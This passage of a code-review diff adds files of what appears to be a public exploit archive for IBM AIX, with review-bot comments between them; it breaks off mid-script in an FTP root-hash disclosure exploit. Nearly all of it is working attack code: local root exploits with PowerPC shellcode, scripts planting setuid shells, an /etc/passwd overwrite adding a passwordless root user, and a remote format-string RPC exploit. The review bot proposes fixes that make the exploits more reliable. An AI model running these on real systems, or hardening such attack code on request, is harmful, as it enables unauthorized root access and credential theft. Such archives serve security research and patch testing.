sleep 10
fi
done
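Review bot: the `while true` poll loop at the end has no upper bound, so if the bounce from `mail nonexistentuser` never arrives the script sleeps forever; cap the number of 10-second retries and exit non-zero when it is reached. `ESCALATE` already prints `[*] Make sure to remove $ROOTSHELL`, and the first call site prints the same line again immediately after it.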

exploits/aix/local/4231.c Normal file

@ -0,0 +1,178 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
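Review bot: this is the same program as `exploits/aix/local/30399.c` earlier in this commit (identical `qaazcode`, `shell()` and `get_addr()`), differing only in the header comment and in computing `addr` before the `!envp[0]` branch; keeping both copies means any correction has to be made twice. `ulong` is not a standard C type and the file relies on the AIX headers for it; the header should state that the code is AIX-only, which `/dev/ptc` and `/proc/<pid>/object/a.out` already imply.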

exploits/aix/local/4232.sh Executable file

@ -0,0 +1,29 @@
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]
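Review bot: `[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib` only checks that a readable `piolib` exists, so a failed `gcc` produces no message and a stale `piolib` from an earlier run would be picked up; test gcc's exit status instead (or run the script under `set -e`), and report the failure.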

exploits/aix/local/4233.c Normal file

@ -0,0 +1,157 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
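Review bot: get_addr() has no real documentation; its only comment is a joke, yet main() depends on its exact arithmetic. Suggest a comment stating that `top` is the end of this process's argv/envp string area, that the return value is that address minus the 4-byte-aligned size of the child's args/envs plus the offset of the `EGG=` payload, and that the `while (off & 3) strcat(envs[0], "X")` loop appends at most three bytes to `pad[16]` (which already holds "PAD=X"), so the buffer is large enough only by construction; a bound check or an explicit comment on that limit would make it obvious. Also, every write() in main() and shell() discards its return value, so a short write to the pipe goes unnoticed.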

141
exploits/aix/local/45938.pl Executable file

@ -0,0 +1,141 @@
# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
# # whoami
# root
#!/usr/bin/perl
print "[+] AIX X11 server local root exploit\n";
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg = `command -v Xorg`);
if ($xorg eq ""){
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
exit;
}
# Check ksh93 is in path
chomp($ksh = `command -v ksh93`);
if ($ksh eq ""){
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
exit;
}
# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array = <$passwd_fh>);
close($passwd_fh);
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd = '';
foreach my $user (@users)
{
$user .= ":";
foreach my $line (@passwd_array)
{
if (index($line, $user) == 0) {
$users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
}
}
}
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log
print "[-] Generating Xorg command \n";
$blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';
print "[-] Opening /tmp/wow.ksh \n";
open($fr, '>', "/tmp/wow.ksh");
# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;
# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");
# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";
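Review bot: the header is internally inconsistent: `# Fileset: X11.base.rte < 7.1.5.32` names a fixed level, while `# IBM has not yet released a patch as of 29/11/2018` says none exists; one of the two statements should be corrected. Separately, both open() calls (on `/etc/passwd` and on `/tmp/wow.ksh`) are unchecked, so a failed open leaves @passwd_array empty or the generated script empty, and the later `cp` and `su` steps still run against the real /etc/passwd; `open(...) or die "...: $!"` would stop the script before anything is modified.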

27
exploits/aix/local/4612.py Executable file

@ -0,0 +1,27 @@
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )
#thomas.pollet@gmail.com
#
from os import execve
bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f"
egg="\x60"*2350
shellcode=( # by intropy <at> caughq.org
"\x7c\xa5\x2a\x79" # xor. r5,r5,r5
"\x40\x82\xff\xfd" # bnel <shellcode>
"\x7f\xe8\x02\xa6" # mflr r31
"\x3b\xff\x01\x20" # cal r31,0x120(r31)
"\x38\x7f\xff\x08" # cal r3,-248(r31)
"\x38\x9f\xff\x10" # cal r4,-240(r31)
"\x90\x7f\xff\x10" # st r3,-240(r31)
"\x90\xbf\xff\x14" # st r5,-236(r31)
"\x88\x5f\xff\x0f" # lbz r2,-241(r31)
"\x98\xbf\xff\x0f" # stb r5,-241(r31)
"\x4c\xc6\x33\x42" # crorc cr6,cr6,cr6
"\x44\xff\xff\x02" # svca
"/bin/sh"
"\x05")
execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})
# milw0rm.com [2007-11-07]

72
exploits/aix/local/699.c Normal file

@ -0,0 +1,72 @@
/* exploit for /usr/bin/paginit
tested on: AIX 5.2
if the exploit fails it's because the shellcode
ends up at a different address. use dbx to check,
and change RETADDR accordingly.
cees-bart <ceesb cs ru nl>
*/
#define RETADDR 0x2ff22c90
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;
char envlabel[] = "X=";
void printint(char* buf, int x) {
buf[0] = x >> 24;
buf[1] = (x >> 16) & 0xff;
buf[2] = (x >> 8) & 0xff;
buf[3] = x & 0xff;
}
int main(int argc, char **argv) {
char *env[3];
char code[1000];
char buf[8000];
char *p, *i;
int offset1 = 0;
offset1 = 0; // atoi(argv[1]);
memset(code, 'C', sizeof(code));
memcpy(code, envlabel,sizeof(envlabel)-1);
// landingzone
for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
printint(i, 0x7ca52a79);
memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
code[sizeof(code)-1] = 0;
env[0] = code;
env[1] = 0;
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf)-1] = 0;
p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone
p += 72;
printint(p, RETADDR); // any readable address (apparently not overwritten)
execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}
// milw0rm.com [2004-12-20]

13
exploits/aix/local/701.sh Executable file

@ -0,0 +1,13 @@
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
# milw0rm.com [2004-12-21]

25
exploits/aix/local/898.sh Executable file

@ -0,0 +1,25 @@
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit
cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
# milw0rm.com [2005-03-25]

33
exploits/aix/local/9306.sh Executable file

@ -0,0 +1,33 @@
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]
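Review bot: the lines after the banner (`Set the following environment variables:` and the three assignments beneath it) are not shell: under the `#!/bin/bash` shebang the first of them tries to run a command named `Set`, and the assignments are plain unexported variables, so the file is really an advisory pasted into a script. Comment those lines out as instructions, as the header block already is, so the file at least parses and its intent is clear.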

90
exploits/aix/local/9645.sh Executable file

@ -0,0 +1,90 @@
#!/bin/sh
#
# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $
#
# raptor_libC - AIX arbitrary file overwrite via libC debug
# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
#
# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle
# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which
# allows local users to gain privileges by leveraging a setuid-root program to
# create an arbitrary root-owned file with world-writable permissions, related
# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1
# (CVE-2009-2669).
#
# Typical privilege escalation techniques via arbitrary file creation don't
# seem to work on recent AIX versions: .rhosts is ignored if it is group or
# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries;
# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's
# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come
# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys,
# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.
#
# See also: http://milw0rm.com/exploits/9306
#
# Usage:
# $ uname -a
# AIX rs6000 3 5 0052288E4C00
# $ lslpp -L xlC.rte | grep xlC.rte
# xlC.rte 9.0.0.1 C F XL C/C++ Runtime
# $ chmod +x raptor_libC
# $ ./raptor_libC /bin/bobobobobob
# [...]
# -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob
#
# Vulnerable platforms (AIX 5.3):
# xlC.rte < 8.0.0.0 [untested]
# xlC.rte 8.0.0.0-8.0.0.14 [untested]
# xlC.rte 9.0.0.0-9.0.0.9 [tested]
# xlC.rte 10.1.0.0-10.1.0.2 [untested]
#
# Vulnerable platforms (AIX 6.1):
# bos.rte.libc 6.1.0.0-6.1.0.11 [untested]
# bos.rte.libc 6.1.1.0-6.1.1.6 [untested]
# bos.rte.libc 6.1.2.0-6.1.2.5 [untested]
# bos.rte.libc 6.1.3.0-6.1.3.2 [untested]
# bos.adt.prof 6.1.0.0-6.1.0.10 [untested]
# bos.adt.prof 6.1.1.0-6.1.1.5 [untested]
# bos.adt.prof 6.1.2.0-6.1.2.4 [untested]
# bos.adt.prof 6.1.3.0-6.1.3.1 [untested]
#
echo "raptor_libC - AIX arbitrary file overwrite via libC debug"
echo "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"
echo
# check the arguments
if [ -z "$1" ]; then
echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"
echo
echo "Usage: $0 <filename>"
echo
exit
fi
# prepare the environment
_LIB_INIT_DBG=1
_LIB_INIT_DBG_FILE=$1
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
# gimme -rw-rw-rw-!
umask 0
# setuid program linked to /usr/lib/libC.a
/usr/dt/bin/dtappgather
# other good setuid targets
# /usr/dt/bin/dtprintinfo
# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
# check the created file
ls -l $_LIB_INIT_DBG_FILE
echo
# milw0rm.com [2009-09-11]

116
exploits/aix/remote/14407.c Normal file

@ -0,0 +1,116 @@
/*************************************************************************
* Check Point Software Technologies - Vulnerability Discovery Team (VDT) *
* Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> *
* *
* rpc.pcnfsd syslog format string vulnerability *
*************************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define PCNFSD_PROG 150001
#define PCNFSD_VERS 1
#define PCNFSD_PR_INIT 2
#define PCNFSD_PR_START 3
struct cm_send {
char *s1;
char *s2;
};
struct cm_send2 {
char *s1;
char *s2;
};
struct cm_reply {
int i;
};
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_send2(XDR *xdrs, struct cm_send2 *objp)
{
if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
if(!xdr_int(xdrs, &objp->i))
return (FALSE);
return (TRUE);
}
int
main(int argc, char *argv[])
{
long ret, offset;
int len, x, y, i;
char *hostname, *b;
CLIENT *cl;
struct cm_send send;
struct cm_send2 send2;
struct cm_reply reply;
struct timeval tm = { 10, 0 };
enum clnt_stat stat;
printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =-\n");
printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n");
printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n");
if(argc < 2) {
printf("Usage: %s [hostname]\n", argv[0]);
exit(1);
}
hostname = argv[1];
send.s1 = "AAAA%n%n%n%n%n%n%n%n%n"; // Create the dir on /var/spool/pcnfs
send.s2 = "";
send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";// Call the dir to trigger fmt bug
send2.s2 = "";
printf("\nSending PCNFSD_PR_INIT to the server ... ");
if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
clnt_pcreateerror("\nerror");exit(-1);
}
stat=clnt_call(cl, PCNFSD_PR_INIT, xdr_cm_send, (caddr_t) &send,
xdr_cm_reply, (caddr_t) &reply, tm);
clnt_destroy(cl);
printf("done!\n");
printf("Sending PCNFSD_PR_START procedure ... ");
if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
clnt_pcreateerror("\nerror");exit(-1);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
stat=clnt_call(cl, PCNFSD_PR_START, xdr_cm_send2, (caddr_t) &send2,
xdr_cm_reply, (caddr_t) &reply, tm);
printf("done!\n");
clnt_destroy(cl);
}
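Review bot: `stat` receives the result of both clnt_call() invocations but is never examined, so a failed or timed-out call still prints `done!`; check it (e.g. `if (stat != RPC_SUCCESS) clnt_perror(cl, "clnt_call");`) before reporting success. `struct cm_send2` and `xdr_cm_send2` are byte-for-byte copies of `cm_send` and `xdr_cm_send` and can be dropped, and main() is declared `int` but falls off the end without a return statement.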

96
exploits/aix/remote/14409.pl Executable file

@ -0,0 +1,96 @@
### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010
use IO::Socket;
$|=1;
print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";
if ($#ARGV < 1) {
print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
print "SAMPLES:\n";
print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
exit;
}
$trgt = $ARGV[0];
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
PeerPort => '21',
Proto => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if ($ARGV[2] eq "") {
$user = "ftp";
$pass = "c0deb4b3\@roothash.com";
} else {
$user = $ARGV[2];
$passwd = $ARGV[3];
}
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***\n";
print "\t$x";
print $sock "USER root\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS sexy\r\n";
$x = <$sock>;
print "\t$x";
}
print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
print $sock "USER $user\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS $passwd\r\n";
$x = <$sock>;
print "\t$x";
if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***\n";
print $sock "CWD pub\r\n";
$x = <$sock>;
